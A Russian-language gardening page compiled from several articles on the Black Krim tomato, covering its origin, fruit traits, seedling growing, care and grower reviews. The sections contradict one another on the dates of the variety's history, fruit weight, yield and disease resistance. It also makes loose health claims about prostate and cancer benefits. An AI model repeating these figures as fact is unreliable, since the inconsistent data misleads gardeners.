7 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика томата черный крым

Характеристика томата Черный Крым

Каждый овощевод стремится вырастить на своем огороде какой-то особенный сорт томатов. Ведь хочется собрать хороший урожай, затратив при этом минимум усилий. Опытные огородники отдают предпочтение проверенным сортам огородных культур. Например, томат Черный Крым завоевал признание овощеводов почти двадцать лет назад. Этот сорт помидоров не является гибридом, а выращивать его можно практически в любом регионе страны.

Характеристика томата Черный Крым

Описание сорта

Название этих томатов соединило в себе и место селекции, и особенный цвет плодов. Это растение впервые появилось на крымском полуострове. Поэтому основными характеристиками этой культуры являются приспосабливаемость к жарким летним дням. Именно при высокой температуре и хорошей освещенности плоды таких томатов удивляют всех своим почти черным цветом.

В целом томат Черный Крым соответствует следующим характеристикам:

  • Среднеранний.
  • Индетерминантный.
  • Высокорослый.
  • Неприхотливый.
  • Урожайный.

Период созревания плодов составляет не более 3 месяцев от момента появления первых всходов. За это время растение вытягивается в высоту на 2 метра. Для того чтобы кусты не поломались, их обязательно нужно подвязать к шпалере или любой другой опоре.

Эта огородная культура требует правильного формирования ствола, своевременного пасынкования.

Каждая кисть может иметь завязи 5–6 помидор. При правильном уходе урожайность каждого куста превышает 4 кг. В интернете можно встретить этот сорт под названием томата Черный Крымский.

Особенности плодов

Плоды помидор с полуострова имеют немного приплюснутую форму. Созревшие помидорчики весят от 300 до 500 граммов каждый. Плоды могут сильно отличаться друг от друга по весу. Самые крупные огородники снимают с первых кистей. Последующие плоды значительно мельче.

Цвет овоща

Крымский помидор отличается очень необычной окраской. В стадии созревания томаты имеют коричнево-бурый отлив, при полном созревании плоды становятся темно-бордовыми. Мякоть, отличающаяся особой мясистостью, в зависимости от степени зрелости может иметь оттенки зеленого, красного, черного.

Вкусовые качества

Плоды данного сорта не подходят для консервации

Эти томаты отличаются хорошими вкусовыми качествами. Сладкие, с яркими томатными нотками и приятным послевкусием плоды рекомендуется употреблять в свежем виде или использовать для приготовления соусов и сока. К сожалению, такие томаты не могут храниться долго. Поэтому готовить из них какие-либо консервации не стоит.

Особенности выращивания

Данный сорт не вызывает сложностей в агротехнике. Самое главное соблюсти несколько правил:

  1. Правильно определить сроки посадки семян на рассаду.
  2. Обеспечить подходящий температурный режим.
  3. Поддерживать необходимый уровень освещенности.

Сорт томата Черный Крым подходит для выращивания как в теплице, так и в открытом грунте. Если в регионе теплый климат, то семена можно высевать в открытый грунт на постоянное место в конце мая. Если же климатические условия не столь щедры, то лучше за 60-65 дней до высадки растения на постоянное место посеять семена на рассаду.

Рассадный метод

Почва для помидор должна быть легкой, достаточно увлажненной и насыщенной всеми питательными веществами.

Опытные овощеводы советуют предварительно землю либо нагреть в духовом шкафу, либо выдержать в морозильной камере. Семена перед посадкой стоит замочить в теплой воде на одни сутки. Это делается с целью ускорить процесс появления ростков.

В ящике с подготовленным грунтом делают бороздки глубиной не более одного сантиметра и опускают в них семена помидор на расстоянии 2 см друг от друга. Далее присыпают их землей, накрывают пленкой и оставляют в темном и теплом месте. Первые всходы должны появиться уже через 3-4 дня.

Теперь ящики с рассадой можно поставить на освещаемый подоконник, а лучше организовать дополнительное освещение. Обязательно соблюдайте баланс между поливами и внесениями удобрений. Для того чтобы не скапливалась излишняя влага стоит позаботиться о вентиляции помещения, где находятся ящики с рассадой.

Высадка ростков на постоянное место

Двухмесячные всходы можно высаживать в теплицу

Следующий этап в развитии томатов – перенос ростков на грядки в теплицу. Это можно делать через 2 месяца после появления первых всходов. В это время у ростков уже имеется по 3-4 листика, и высота растения достигает 20 см. Под томатные грядки выбираются те участки, на которых росли огурцы, капуста, бахча. Не рекомендуется высаживать помидоры на те грядки, где в прошлом году росли перец, томаты, баклажаны. При этом если планируется выращивать помидоры в один стебель, то на один квадратный метр можно высадить не более четырех ростков. Если же растение будет формироваться с двумя стеблями, то на каждый квадратный метр грядок рекомендуется высаживать всего три ростка.

Теперь необходимо организовать правильный уход за растением. Это заключается в следующем:

  1. Формирование кустов.
  2. Пасынкование.
  3. Регулярный полив.
  4. Сбалансированные подкормки.

Формирование кустов

Поскольку растение очень сильно тянется в высоту, его нужно правильно сформировать. Если куст планируется с одним стеблем, то после того как верхнее соцветие полностью раскроется, необходимо прищипнуть верхушку побега. При этом над цветком должно остаться два листа, которые будут снабжать плоды питательными веществами.

Если растение формируется в два стебля, то кроме главного нужно оставить один из боковых побегов. При этом на основном стебле оставляют 5 соцветий для плодоношения, а на втором – от 2 до 4 кистей. После этого проводят прищипку верхушки.

Для правильного формирования куста необходимо обеспечить подвязку растения. Для этого нужен шпагат и колья. Подвязку томатных кустов следует проводить в течение всего периода развития растения. Пожелтевшие листья, а также все нижние листья до первой кисти с плодами необходимо периодически убирать.

Для того чтобы все плоды успели вызреть, нельзя допускать лишней нагрузки на кусты. Для этого все боковые побеги в пазухах листьев удаляют. Желательно проводить пасынкование в период развития первого листика на побегах. В это время они легко отламываются. Если же пасынки уже имеют несколько листочков, то рекомендуется их срезать ножом.

Полив

Первый полив растения проводят сразу после высадки его на постоянное место. Дальше томаты поливают не более двух раз в неделю. Воду для поливов желательно использовать отстоявшуюся. В период цветения следует увеличить количество воды на куст до пяти литров, а вот во время плодоношения, чтобы кожура не полопалась, расход воды на каждый куст нужно уменьшить до трех литров.

Удобрение

Первый раз культуру удобряют азотом через две недели после пересадки. Следующая подкормка должна быть через 7-10 дней. В это время необходимо внести фосфор и калий. В период цветения можно опрыскать растения раствором борной кислоты, а в период завязывания плодов еще раз обработать кусты суперфосфатом.

Салатный король — томат сорта Крымский чёрный (Чёрный Крым)

Обычно между сроками созревания и размерами томатных плодов существует прямая связь. Так, ранние сорта являются мелкоплодными. Они не отличаются особым вкусом, но их удобно консервировать целиком. Большинство же салатных сортов имеет средние сроки созревания. Но эту зависимость игнорирует сорт помидоров Крымский чёрный, который радует огородников вкусными и крупными плодами салатного назначения.

Характеристики сорта Крымский чёрный

Крымский чёрный, или Чёрный Крым, – среднеспелый сорт томатов, первые плоды которого достигают спелости через 105–115 суток после массового появления всходов. Он рекомендован для выращивания в открытом грунте во всех регионах страны, включая зоны рискованного земледелия. Помидоры проявляют устойчивость к таким заболеваниям, как вершинная, корневая и серая гнили, но они не имеют иммунитета к фитофторозу.

Свою историю сорт Крымский чёрный начал в 1990 году, когда его заметил селекционер из Швеции Ларс Олов Розентром. Так, томат завоевал сердца европейцев, а затем попал в США, где попал в топ-10 самых вкусных помидоров. И только после этого он стал культивироваться в России. В Госреестре сорт был зарегистрирован в 2015 году агрофирмой «Евро-Семена», которая производит семена этого томата до сих пор.

Высокорослые кусты требуют подвязывания к опорам и формирования (удаления пасынков и лишних листьев). В кистях формируется по 5–6 плодов, кажд ый из которых, по данным Госреестра, в среднем достигает массы в 235 г. По данным производителя семян каждый помидор весит до 200 г. Урожайность во многом зависит от условий содержания растений. В открытом грунте при хорошем уходе она составляет 3–4 кг. Товарная урожайность (масса плодов с товарным внешним видом) составляет в среднем 5,1 кг с 1 м 2 .

Описание внешнего вида кустов и плодов

Чёрный Крым формирует индетерминантный куст, высота которого в теплицах достигает 1,8 м. На открытых грядках они вырастают лишь до 1,2–1,5 м. Облиственность слабая. Окраска листвы — светлая зелёная.

В кистях формируются округлые плоды сплющенной формы со средней ребристостью по бокам. Помидоры покрыты плотной кожицей, окрашенной в тёмный красный цвет, с чёрным и фиолетовым оттенками.

Плоды томата Крымский чёрный крупные, они имею плоско-округлую форму и чёрно-красную окраску с зелёными и фиолетовыми оттенками

Внутри плодов находится тёмная мясистая мякоть, в которой содержится много сахара. Семенных камер и семян мало. Вкус выраженный, сладкий, аромат сильный.

Семенные камеры внутри томата Чёрный Крым имеют небольшие размеры и содержат мало семян

Преимущества и недостатки сорта

Основными преимуществами томата Чёрный Крым перед другими сортами помидоров являются:

  • высокая урожайность (при условии соблюдения особенностей агротехники);
  • возможность сбора семян в качестве будущего посевного материала (не относится к гибридам);
  • отменные вкусовые качества (сорт популярен не только в России, но и в Европе, США);
  • высокое содержание сахара в мякоти;
  • плоды могут дозариваться самостоятельно после их срыва в зелёном виде.

Однако сорт не лишён следующих минусов:

  • средняя устойчивость к заболеваниям (томат Крымский чёрный подвержен заболеванию фитофторозом);
  • высокорослость (требует пасынкования и подвязывания к шпалерам);
  • нетранспортабельность (плоды не выдерживают длительной транспортировки);
  • непродолжительный срок хранения;
  • предрасположенность к растрескиванию плодов.

Помидоры Чёрный Крым особенно сильно трескаются, если под их кустами чрезмерно увлажнять грунт

Что касается крупноплодности томата Чёрный Крым, то дачники иногда считают это качество положительным, а порой — отрицательным. Производитель семян указывает, что это помидоры исключительно салатного назначения.

По товарной урожайности, которая у Крымского чёрного в среднем составляет 5,1 кг с 1 м 2 , сорт несколько уступает Чёрному барону (6,5 кг с 1 м 2 ) и Чёрному принцу (6,2–7 кг с 1 м 2 ). Он также отличается более крупными плодами (средняя масса — 235 г) по сравнению с Чёрным принцем (средний вес плода 110 г) и Чёрным мавром (45 г). Основное преимущество Чёрного Крыма перед этими сортами заключается в том, что ему не требуются тепличные условия независимо от региона выращивания.

Особенности выращивания и посадки томата Крымский чёрный

Время посева нужно рассчитать так, чтобы к моменту высадки саженцев на постоянное место их возраст составлял не менее 50, но не более 65 суток. В зависимости от региона выращивания сроки заделки семян могут варьироваться с конца февраля до начала апреля. Оптимальный грунт — смесь торфа с огородной землёй или универсальная рассадная почвенная смесь. Всходы начинают массово появляться уже через 3–4 дня. Их пикируют в индивидуальные ёмкости после появления первой пары настоящих листьев.

За 10–14 дней до высадки саженцев в теплицу/открытый грунт их закаливают, вынося на улицу в дневное время. Высаживать растения следует по схеме 50х50 см, если вы будете формировать кусты в 1 стебель. Если в 2 или 3 стебля, то сажать нужно реже: по схеме 50х60 или даже 60х60 см.

Куст томата Крымский чёрный обычно формируют в 2 стебля

Уход за помидорами стандартный. Они нуждаются в обрывании пасынков и нижних листьев с частотой 1 раз в неделю. Землю под кустами нужно регулярно рыхлить, пропалывать и увлажнять. Полив производят 2–3 раза в неделю. В период созревания плодов под куст нельзя лить больше 3–5 л воды, иначе они растрескаются.

Видео: результат выращивания томата Чёрный Крым в теплице

Отзывы о сорте

Помидоры Черный Крым (Black Krim) — сажала в прошлом году, очень хороший, среднего размера, окраска получилась лилово-коричневой.

Irina

dacha.wcb.ru/lofiversion/index.php?t2145.html

Сорт Чёрный Крым вкусный, крупный и урожайный. Но все мои помидоры заболели фитофторой. Правда, я выращивала их в открытом грунте, а лето выдалось холодным и мокрым. Думаю, что Крымский чёрный при выращивании в теплице показал бы себя лучше.

Олеся

dacha.wcb.ru/lofiversion/index.php?t2145.html

Чёрный Крым показал себя достойно среди других чёрных помидоров (Черномор, Чёрный мавр). И по вкусовым качествам он у них выигрывает.

Elfa

http://www.tomat-pomidor.com/forums/topic/477-%D1%87%D1%91%D1%80%D0%BD%D1%8B%D0%B9-%D0%BA%D1%80%D1%8B%D0%BC-noire-de-crimee/

Крымский чёрный — один из лучших сортов чёрных томатов, не являющийся гибридом. Его плоды настолько вкусные, что он стал известен не только в России, но и в США, а также в странах Европы. При этом помидоры не требуют пристального внимания: уход за ними стандартный. Однако следует следить за режимом полива, чтобы предотвратить растрескивание плодов, которое существенно снижает срок их хранения.

Отечественный сорт томата «Черный Крым» или «Черный Крымский»: описание, характеристика, посев на рассаду, подкормка, урожайность, фото, видео и самые распространенные болезни томатов

«Черный Крым» (другое название – «Черный Крымский») привлекателен необычной расцветкой плодов. Благодаря раннему созреванию его можно выращивать в любом регионе. Кроме того, этот томат наделен исключительным вкусом.

Сорт томата «Черный Крым» или «Черный Крымский»:

Происхождение сорта помидоров «Черный Крым» или «Черный Крымский»

«Крымский черный» был одним из многочисленных томатов, выведенных в Крыму в советское время. Для широкой общественности его открыл шведский коллекционер Л.О.Розентром, заметивший этот сорт во время своего посещения Крымского полуострова. В 1990 году томат был внесен в каталог SeedSaver’sExchange, после чего начал стремительно набирать популярность не только в России, но и в Европе и США.

Описание сорта

Техническая зрелость томатов наступает в рекордно короткие сроки – от 70 до 80 дней с момента посева. Кусты относятся к индетерминантному типу — они вырастают до 180 см.

Плоды

Как следует из названия, главная особенность сорта – необычная окраска его плодов. В процессе вегетации их цвет меняется от светло зеленого до глубокого бордового, переходящего в черный. Также томаты отличаются правильной круглой формой и крупным размером (около 500 грамм).

Прочие особенности плодов:

  • Нежная сочная мякоть;
  • Небольшое содержание сухих веществ;
  • Выразительный вкус и яркий аромат.

Описание:

Помидоры: достоинства и недостатки

Привлекательные стороны сорта «Черный Крымский»:

  • Высокая урожайность в сочетании с крупноплодностью;
  • Раннее созревание;
  • Отличный товарный вид и вкус;
  • Крепкий иммунитет.

Недостатки сорта:

  • Высокорослые растения требуют пасынкования и подвязки;
  • Короткий срок хранения плодов из-за тонкой кожицы;
  • Труднодоступность семян – редко бывают в продаже.

Применение плодов

Помидоры «Черного Крыма» имеют множество полезных свойств, раскрывающихся при употреблении в свежем виде:

  1. Содержащийся в них ликопин стимулирует работу предстательной железы;
  2. Витамин А улучшает зрение;
  3. Антоциановый пигмент является природным антиоксидантом, необходимым для профилактики онкологических заболеваний.

Томаты хорошо подходят для переработки на сок и пасту, но не годятся для консервации: из-за крупного размера плоды не помещаются в банку, а кожица трескается при термической обработке.

Выращивание помидоров

Лучше всего «Черный Крымский» чувствует себя в родном климате – в теплых солнечных регионах с продолжительным летом. Однако быстрое созревание позволяет вырастить его в открытом грунте даже в средней полосе. Сорт подходит для культивирования любым методом: как рассадным, так и безрассадным.

Как подготовить семена?

Семена собирают из плодов, экстерьер которых наиболее соответствует номиналу. Кусты, на которых они выросли, должны быть крепкими и здоровыми. Мелко порезав и смяв плоды в кашицу, их оставляют в стеклянной банке до начала ферментации (брожения), затем извлекают, промывают и тщательно высушивают.

Для повышения всхожести и улучшения качества рассады необходимо провести полноценную предпосевную обработку. Она включает такие этапы:

  • Прогревание в течение нескольких дней при температуре 40-50*С;
  • Осмотр и отбраковка поврежденных, заплесневелых или не однородно окрашенных семян;
  • Замачивание в слабом солевом растворе для выявления пустых семечек;
  • Протравливание раствором марганцовки (10 мг на 50 мл жидкости);
  • Стимуляция роста с помощью специальных препаратов: «Эпин-Экстра», «Циркон»;
  • Замачивание в воде комнатной температуры на несколько часов перед посадкой.

Посев семенного материала

Посев на рассаду проводят в последней декаде апреля – первых числах мая. В открытый грунт семена сеют в начале июня, когда почва прогреется не менее чем до 15*С.

Существует два способа посева рассады:

Традиционный способ

В стандартную тару для посева насыпают удобренный субстрат, проделывают дорожки глубиной 1-1,5 см и выкладывают в них семена через 2 см. Сравняв землю и тщательно увлажнив теплой водой, рассаду укрывают прозрачным полиэтиленом до проклевывания семян. Затем раскрывают и переносят в хорошо освещенное место с температурой 22-24*С.

На стадии появления второго листа растения пикируют в отдельные емкости. Желательно использовать для этого такую тару, из которой не нужно будет вынимать их при переселении на постоянное место. Например, бумажные стаканы или торфяные горшочки.

Быстрый способ

В качестве тары используют большой деревянный ящик глубиной не менее 10 см. Семена заглубляют в землю квадратно-гнездовым способом через 10 см. После посева землю опрыскивают «Гуматом» из распылителя, выносят рассаду на застекленный балкон или в теплицу. Сверху ящик укрывают нетканым материалом (но не пленкой). После появления всходов укрытие убирают и ставят только на ночь для защиты от переохлаждения или в редких случаях днем – для защиты от палящего солнца. Пикировка не требуется.

Правила высадки рассады

Рассаду, достигшую возраста 35-45 дней высаживают на постоянное место. На юге высадку проводят в конце мая, в средней полосе – не раньше середины июня.

Примерная схема высадки:

  • Глубина посадочных лунок – 12-15 см;
  • Расстояние между кустами – 50 см;
  • Ширина междурядий – 70 см.

Уход за кустами

Сорт «Крымский Черный» требует регулярного пасынкования, начиная с 10-го дня после высадки. Растения формируют в один стебель, удаляя все побочные побеги и нижние листья.

Другие аспекты ухода:

  • Подвязка стебля во избежание обламывания ветром или падения от тяжести плодов;
  • Неглубокий полив 2-3 раза в неделю по мере пересыхания почвы. Главные правила полива:
    • Использовать теплую и отстоянную воду;
    • Поливать после захода солнца;
    • Избегать попадания влаги на листья;
    • Земля должна быть пролита на глубину 25-35 см, но вода не должна стоять на грядке;
  • Разбивание тяпкой или граблями засохшей земляной корки;
  • Постоянное удаление сорняков;
  • Комплексные подкормки несколько раз за сезон.

Болезни и вредители

«Черный Крым» имеет стойкую сопротивляемость к большинству известных заболеваний.

Для борьбы с этой проблемой следует соблюдать простые правила:

  • Не поливать в жару;
  • Контролировать количество азота в почве;
  • Придерживаться влажности воздуха в теплице в пределах 30-60%;
  • Мульчировать землю после полива.

Урожайность

Томат «Черный Крымский» дает в среднем по 4 кг отборных плодов с одного куста. В пересчете на площадь этот показатель составит 20-24 кг с 1 кв.м.

В каких регионах лучше выращивать?

Сорт лучше всего чувствует себя в родных условиях – под южным солнцем, без резких колебаний температуры. Оптимальные регионы для его культивирования: Крым, Астраханская, Белгородская область, Краснодарский край.

Отзывы о сорте

Все, кто выращивал «Черный Крым», отмечают его исключительные качества плодов: соразмерные, весом не менее 300-400 грамм каждый, сладкие и сочные. В теплице кусты вырастают до самой крыши, в открытом грунте редко превышают 130 см. При выращивании огородники чаще всего испытывают трудности, связанные с растрескиванием плодов, которое вызвано не регулярным и не сбалансированным поливом.

Томат Крымский черный: отзывы, характеристика

Томат Черный Крым получил распространение благодаря Ларсу Олову Розентрому. Шведский коллекционер обратил внимание на этот сорт при посещении полуострова Крым.

С 1990 года томат получил распространение в США, Европе и России. Его выращивают в тепличных условиях и под открытым небом.

Описание сорта

По фото и отзывам томат Черный Крым соответствует следующему описанию:

  • среднераннее созревание;
  • от высадки семян до сбора урожая проходит 69-80 дней;
  • индетерминантный куст;
  • высота томата – 1,8 м;
  • стойкость к болезням.

Плоды помидоров Черный Крым имеют ряд особенностей:

  • крупные томаты весом 500 г;
  • плоскоокруглая форма;
  • мясистые плоды с плотной кожицей;
  • неспелые помидоры имеют зелено-коричневый цвет;
  • в процесс созревания плоды приобретают бордовый, почти черный оттенок;
  • высокие вкусовые качества;
  • среднее содержание сухих веществ.

Урожайность сорта

С одного куста сорта Черный Крым собирают до 4 кг плодов. Эти томаты не подлежат длительному хранению и транспортировке.

Плоды сорта используют для приготовления салатов, соков, пюре, первых и вторых блюд. Для консервирования такие помидоры слишком большие и мягкие, поэтому рекомендуется употреблять их в свежем виде или перерабатывать.

Порядок посадки

Томат Черный Крым можно получить рассадным способом. Для этого в домашних условиях производят посадку семян в небольшие ящики. Когда растения достигнут полутора-двух месяцев, их переносят в теплицу или на открытый участок.

Допускается посадка семян непосредственно в открытый грунт при благоприятных климатических условиях в регионе.

Подготовка рассады

Для получения рассады томатов готовят грунт, состоящий в равных пропорциях из перегноя и дерновой земли. Предварительно рекомендуется обработать почву путем нагрева в духовке или помещения в морозильник. Через 2 недели можно приступать к посадочным работам.

Семенной материал также подвергают обработке. Его замачивают на сутки в теплой воде, чтобы стимулировать появление ростков. Покупные семена помидоров уже прошли подобную обработку, поэтому их можно сразу приступать к посадке.

На поверхности почвы делают борозды на глубину 1 см. Семена располагают через каждые 2 см. После посадки емкости накрывают стеклом или пленкой, после чего оставляют их в темном и теплом месте.

Согласно отзывам на томат Черный Крымский, при температуре 25-30 градусов всходы появляются через 3 дня. Если температура окружающей среды окажется ниже, то ростам потребуется больше времени.

Рассаду переставляют на подоконник, причем обеспечивают постоянную подсветку на протяжении 12 часов. Периодически помидоры поливают, чтобы не допустить пересыхание грунта.

Посадка в теплицу

В теплицу переносят рассаду томатов, которая достигла 20 см в высоту. Такие растения имеют 3-4 листа и развитую корневую систему.

Почву под томаты перекапывают осенью. Верхний слой грунта устраняют, чтобы в будущем избежать распространения заболеваний и вредителей. Два года подряд помидоры не выращивают на одном месте.

Сорт Черный Крымский высаживают рядами или в шахматном порядке. Между растениями оставляют 60 см, а между рядами – 70 см.

Для посадки томатов делают лунку, в которую помещают корневую систему. Затем корни растения засыпают и немного уплотняют землю. Завершающим этапом является полив растений.

Посадка в открытый грунт

В регионах с теплым климатом рассаду сорта Черный Крым переносят в открытый грунт. Отзывы на томат Черный Крымский показывают, что эти помидоры хорошо растут под открытым небом.

Схема посадки является следующей: между растениями сохраняют интервал, равный 60 см. Посадить томаты можно в несколько рядов.

Если на грядках уже росли томаты или перцы, то повторная высадка культуры не проводится. В качестве удобрения для грунта используется компост или перепревший навоз.

Осенью грядки нужно перекопать. Весной проводят глубокое рыхление и готовят ямы под посадку. Переносить томаты в открытый грунт следует после установления теплой погоды. Воздух и почва должны хорошо прогреться. Если сохраняется угроза похолоданий, то помидоры накрывают агроволокном.

В открытый грунт можно посадить семена сорта Черный Крым. Однако для получения урожая потребуется больше времени.

Уход за томатами

Сорт Черный Крым нуждается в постоянном уходе. Сюда относится полив и внесение удобрений. Растения поливают как минимум один раз в неделю. Удобрения вносят через каждые 2 недели.

Отзывы на томат Черный Крым свидетельствуют, что сорт редко подвергается заболеваниям. Для профилактики рекомендуется соблюдать агротехнику, избегать загущенности посадок, своевременно производить полив и прополку.

Поскольку сорт является высокорослым, его подвязывают к опоре. Для формирования куста проводят пасынкование лишних побегов.

Пасынкование и подвязывание

Томат Черный Крым вырастает высотой до 1,8 м, поэтому требует подвязывания. Рядом с каждым кустом устанавливается опора из дерева или металла. По мере роста помидоры подвязывают к ней у верхушки.

Куст сорта Черный Крым формируют в один или два стебля. Если необходимо получить крупные плоды, то оставляют один стебель и нормируют число завязей. При формировании томатов в два стебля урожайность повышается за счет большого количества плодов.

При пасынковании устраняют побеги, растущие из пазухи листа. Процедура позволяет растениям направить силы на формирование плодов. Побеги обламывают вручную до того, как их длина достигнет 5 см.

Полив посадок

Томаты поливают один или два раза в неделю в зависимости от условий выращивания и погодных факторов. Увлажненность грунта поддерживают на уровне 85%.

Важно не допускать возникновения сухой корки на поверхности почвы. Поэтому после полива проводят рыхление и окучивание помидоров.

Предварительно вода должна отстояться и согреться. Первый полив производят сразу после переноса растений на постоянное место. Следующее внесение влаги должно состояться через неделю, чтобы растения смогли адаптироваться к новым условиям.

Особенно важен полив в период цветения. В это время под каждый томат еженедельно наливают по 5 л воды. В период плодоношения помидорам достаточно 3 л воды, чтобы избежать растрескивания томатов.

Внесение удобрений

Первая подкормка томатов выполняется через 2 недели после переноса растений на постоянное место. В этот период можно подкормить посадки удобрением, содержащим азот.

На литр воды добавляют 1 ст. л. мочевины, после чего поливают томаты под корень. В дальнейшем не рекомендуется злоупотреблять азотными подкормками, чтобы избежать чрезмерного роста зеленой массы.

Через неделю вносится фосфор и калий. Их используют в виде суперфосфата и сернистого калия. Каждого вещества берется по 30 г на ведро воды. Полив выполняется под корень.

Повторную подкормку суперфосфатом выполняют при созревании плодов. На литр воды берется 1 ст. л. этого компонента. Посадки опрыскивают полученным раствором.

Отзывы садоводов

Заключение

Сорт Черный Крым отличается среднеранним созреванием. Помидоры вырастают достаточно высокими, поэтому нуждаются в опоре и подвязывании. Плоды сорта обладают необычным темным цветом, большими размерами и хорошим вкусом. Их используют в свежем виде или перерабатывают для домашних заготовок.

При правильном уходе сорт демонстрирует высокую урожайность. Томаты Черный Крым редко подвергаются заболеваниям. Избежать распространения болезней помогает соблюдение агротехники.

Томат сорта Чёрный Крым

Томат Черный Крым обладает интересной историей появления. Шведский селекционер Ларс Олов Розентр, пребывая на Крымском полуострове, заметил нестандартные помидоры, которые отличались своей формой, цветом и прекрасным вкусом. В 1900 г сорт был внесен в европейский селекционный каталог.

Томат сорта Чёрный Крым

Краткая информация о сорте

  • Плоды и куст: растение индетерминантное, куст штамбовый и устойчивый. Масса плодов – до 500 г. Цвет темно-бордовый, текстура плотная. Вкус сладковатый.
  • Урожайность: с 1 куста собирают до 6 кг, с 1 м² — до 23 кг.
  • Устойчивость: не боится высокой температуры, но неустойчив к основным болезням рода пасленовых. Не требует обильного полива.
  • Распространение: растут в теплицах в южных и средних регионах России.
  • Применение: используют в свежем виде для приготовления салатов или перерабатывают на зимние заготовки.
  • Посадка: выращивают в теплицах. Сажают в начале мая. Схема: 3-4 куста на 1 м².
  • Почва: оптимально подходит супесчаный грунт.
  • Уход: полив по необходимости. Удобрения вносят 3-4 раза за сезон. Куст формируют в 1-2 стебля. Грунт периодически рыхлят и убирают сорняки.
  • Период созревания и хранение: Плоды созревают в конце июня. Период плодоношения длится около месяца. Помидоры плохо хранятся (4-5 дней) и склонны к растрескиванию.

Общая характеристика

По описанию, томат Черный крым имеет множество позитивных качеств. Он проверен временем и пользуется спросом не только на территории России, но и далеко за ее пределами.

Сорт ранний, от посева рассады до начала сбора урожая проходит всего 80-90 дней.

Предназначен только для выращивания в тепличных условиях, в южных можно использовать пленочные укрытия.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Поскольку сорт ранний, то выращивать его в открытом грунте можно не только в южных регионах страны, но и в средней полосе России. Однако стоит учесть, что в более прохладных условиях средней полосы вкусовые качества плодов будут ниже.

Кусты

Растение индетерминантное, не имеет гибридных аналогов. Куст мощный, с устойчивым основным стеблем, штамбовый. Достигает высоты около 2 м, поэтому нуждается в подвязке и пасынковании.

Листья упругие, насыщенного зеленого цвета, наблюдается легкий приятный пушок.

Плоды

Помидоры отличаются насыщенным темно-бордовым, а иногда даже шоколадным оттенком.

Плоды массивные, весят 350-600 г. Форма округлая, а у самых больших она неправильная – разделена на сегменты и приплюснута.

Кожица средней плотности, гладкая. Внутри плода располагается 3 маленьких семенных камеры, поэтому жидкости и семян внутри немного.

Структура мякоти сочная, плотная и зернистая. Вкус приятный, сладковатый.

Урожайность и плодоношение

Если соблюдать агротехнику и все правила по уходу, то результаты не заставят себя долго ждать.

С одного куста можно собрать до 6 кг плодов. С 1 м² урожайность может достигать до 22 кг.

Плодоносить культура начинает уже во второй половине июня. Период длится около 4-5 недель.

Собирать урожай необходимо каждые 3-5 дней, выбирают сухую погоду. Нельзя допускать переспевания плодов, иначе они растрескиваются.

Хранят томаты в темном прохладном месте при температуре 2-5°, средняя влажность около 70%. Так они могут лежать до 3-5 дней.

Устойчивость к болезням и вредителям

Крымский сорт не гибридный, поэтому вероятность заболеваний намного выше.

Томат подвергается негативному влиянию насекомых. Особенно опасными являются колорадский жук и тля.

Чтобы не допустить потери урожая, необходимо проводить профилактические меры:

  • для отпугивания насекомых и обработки почвы в неё подсыпают перетертый мел или древесную золу;
  • семена перед посевом нужно закалить;
  • помидоры опрыскивают разведенным водой кислым молоком или настоем зеленой травы;
  • на здоровье растений влияют погодные условия, температура воздуха, правильный полив и режим внесения удобрений.

Область применения плодов

Крымский черный томат – универсальный. Его используют и в домашних условиях, и в перерабатывающей промышленности.

Мякоть в порезанном виде (в салатах) отлично сохраняет форму и долго не растекается. В приготовленных горячих блюдах он сохраняет текстуру, приятный вкус и аромат.

Единственным недостатком в домашнем употреблении является крупный размер помидоров, из-за которого невозможно сделать баночную заготовку на зиму.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Не нужно требовать от сорта того, для чего он не предназначен. Это типичный сорт салатного назначения. Для переработки (цельноплодного консервирования) есть масса других сортов.

В промышленном производстве их используют для приготовления паст, кетчупов, соусов и соков.

Достоинства и недостатки

Необычные вкусные помидоры

Согласно описанию томата, Чёрный Крым наделен следующими преимуществами:

  • не требует особых условий и ухода в процессе выращивания;
  • высокие показатели урожайности;
  • прекрасные вкусовые качества;
  • необычный внешний вид плодов, что сразу привлекает покупателей;
  • легко переносит жару: возможность выращивать в южных областях под открытым небом.

Наряду с позитивными качествами у томатов есть и некоторые минусы:

  • плохая транспортабельность и лежкость, из-за этого лучше не выращивать слишком много растений;
  • плодам свойственно трескаться (это происходит из-за избытка влаги);
  • кусты нужно подвязывать в нескольких местах, иначе они ломаются;
  • для хорошего результата используют только магазинные семена.

Выращивание рассады

Черные крымские помидоры лучше развиваются, если их посадить через рассаду.

После посева должно пройти 50-60 дней, чтобы пересадить ростки в грунт. Происходит посев в конце февраля–начале марта.

Подготовка семян

Покупают качественные семена у проверенных поставщиков. Те, которые лежат больше 2 лет, не взойдут (они пересушены и пустые), поэтому необходимо проверять срок годности.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Семена томата сохраняют всхожесть в среднем в течение 5-6 лет после сбора. При благоприятных условиях хранения они могут взойти и через 8-10 лет.

Их замачивают в подсоленной воде на 20-30 минут, а потом помещают во влажную ткань (только натуральную) или салфетку, чтобы семена проклюнулись. Ткань периодически смачивают, чтобы она не высохла.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

В растворе соли семена разделяются на 2 фракции. Полновесные семена, пригодные для сева опускаются на дно. Щуплые — остаются на поверхности.

Семена закаляют: на 12 часов оставляют в холодильнике, а затем 12 часов держат в при комнатной температуре . Так повторяют в течение 7-8 дней.

Схема высадки

Почву готовят следующим образом: 2 части торфа, 1 часть перегноя и 1 часть перепревших опилок. Семена высевают в емкости на глубину 1,5-2 см.

Удобнее использовать горшки из торфа, которые при пересадке в теплицы не нужно снимать. Сгодятся и простые пластиковые стаканы.

До появления всходов емкости держат в теплом место (22-25°) и накрывают прозрачной пленкой или стеклом для сохранения почвы от пересыхания.

Рассаду пикируют, когда сформируются 2-3 настоящих листьев. Пересаживая росток в емкость побольше, нужно стараться не повредить корни, они еще несформированные и хрупкие.

Через 2 недели после укоренения рассады вносят первые удобрения. Подойдут специальные удобрения для рассады: Акварин, Кристаллон, Растворин.

Пересадка рассады

Высаживаем в теплицу в глубокие ямки

Когда растение полностью окрепнет, при росте 15-18 см в высоту, его пересаживают в теплицу.

Это приблизительно происходит в первых числах мая. Средняя температура воздуха должна быть не ниже 18-20°.

Способ посадки: между рядами расстояние в 50 см, между кустами – около 40 см (если растить в 1 стебель) и не меньше 50, если стебля 2 или 3.

Лунки выкапывают достаточной глубины под размер корня, туда вливают около 500 мл воды, а затем помещают растение и слегка уплотняют землю.
